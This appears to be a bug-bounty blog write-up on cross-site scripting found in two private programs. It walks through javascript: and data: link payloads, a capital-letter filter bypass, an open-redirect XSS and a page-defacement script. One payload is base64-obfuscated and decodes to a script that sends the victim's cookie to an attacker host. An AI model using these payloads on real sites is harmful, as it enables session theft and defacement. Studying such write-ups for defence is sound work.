Hi, it’s being a long time since I do a write up so this post i s all about the xss I found in two different private programs so let get start

So the 1st program have feature like that

Image for post
Image for post

where we can put some html code and try to do XSS but i try with different method and possible all the event handler to get xss but the program in checking all the things properly and removing all the things started from on keyword

So the one thing some in my mind let try the xss on links so the next was
<a href=”javascript:alert(1)”>xD</a>
and boom xss popup this is the area of compose post where we write post and then published it where other users can also saw the post so any one click on the link the xss popup

Image for post
Image for post

reported the issue the to program they quick fixed that i was trying to bypass the filteration after and note that the they were checking javascrit: in the href if it’s their then it escaping it so i try different methods like url encode and colon; instead of : but no method worked then i do some googling and find a payload <a href=”data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly9hdHRhY2tlci5jb20vJytkb2N1bWVudC5jb29raWU8L3NjcmlwdD4=”>test</a>

so i used this payload and it worked and i able to steal the user cookie with this also again reported this to the program and they fixed it then i was again checking this and they apply the same fixed as they apply in javascript: one & now they are checking for both data: and javascript: so I was trying to bypass that and didn’t expect that the bypass was to easy I just think that the program was checking this like that

Image for post
Image for post

so if we just make any later capital in the payload it worked and try this boom this worked and same try with data: and it worked reported this program and get $500 for all the 4 XSS

so the 2nd program have url like that
https://PRIVATEcom/?url=[URL]
it’s a download link which is render in the webpage

Image for post
Image for post

if you click on **Click here if the download doesn’t start in several seconds.** i will go to the url which is in the url parm so I changed it to javascript:alert(1) & used data: payload here and it worked on the 1st attempt :D

Image for post
Image for post

the url parm comes in a href=”[URL]” so i try to inject another to get ride over href=” ” and it was properly checking and by mistake enter “</><h1>ss</h1> and boom HTML injected

Image for post
Image for post

so after that i try to do something with this and what about a defaced :D
my next payload was

“</><script> document.getElementsByTagName(“body”)[0].innerHTML = “<h1 style=’font-size:113px;’><br>Inside The B0x!!</h1>”;</script>

the payload first grab <body> tag and change it entire HTML to <h1 style=’font-size:113px;’><br>Inside The B0x!!</h1>

Image for post
Image for post

and the 2nd xss on that program is in this url
https://PRIVATE.com/account/login?redirectURL=PRIVATE/accoun/edit-profile

if user enter the valid credential it will redirect to the url giving in redirectURL parm so just try the luckiest payload javascript:alert(1) bo0m

https://PRIVATE.com/account/login?redirectURL=javascript:alert(1)

now when user enter his credential the xss popup

Image for post
Image for post

hope you guy like it and sorry for bad english :P

./Logout ;)

Written by

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store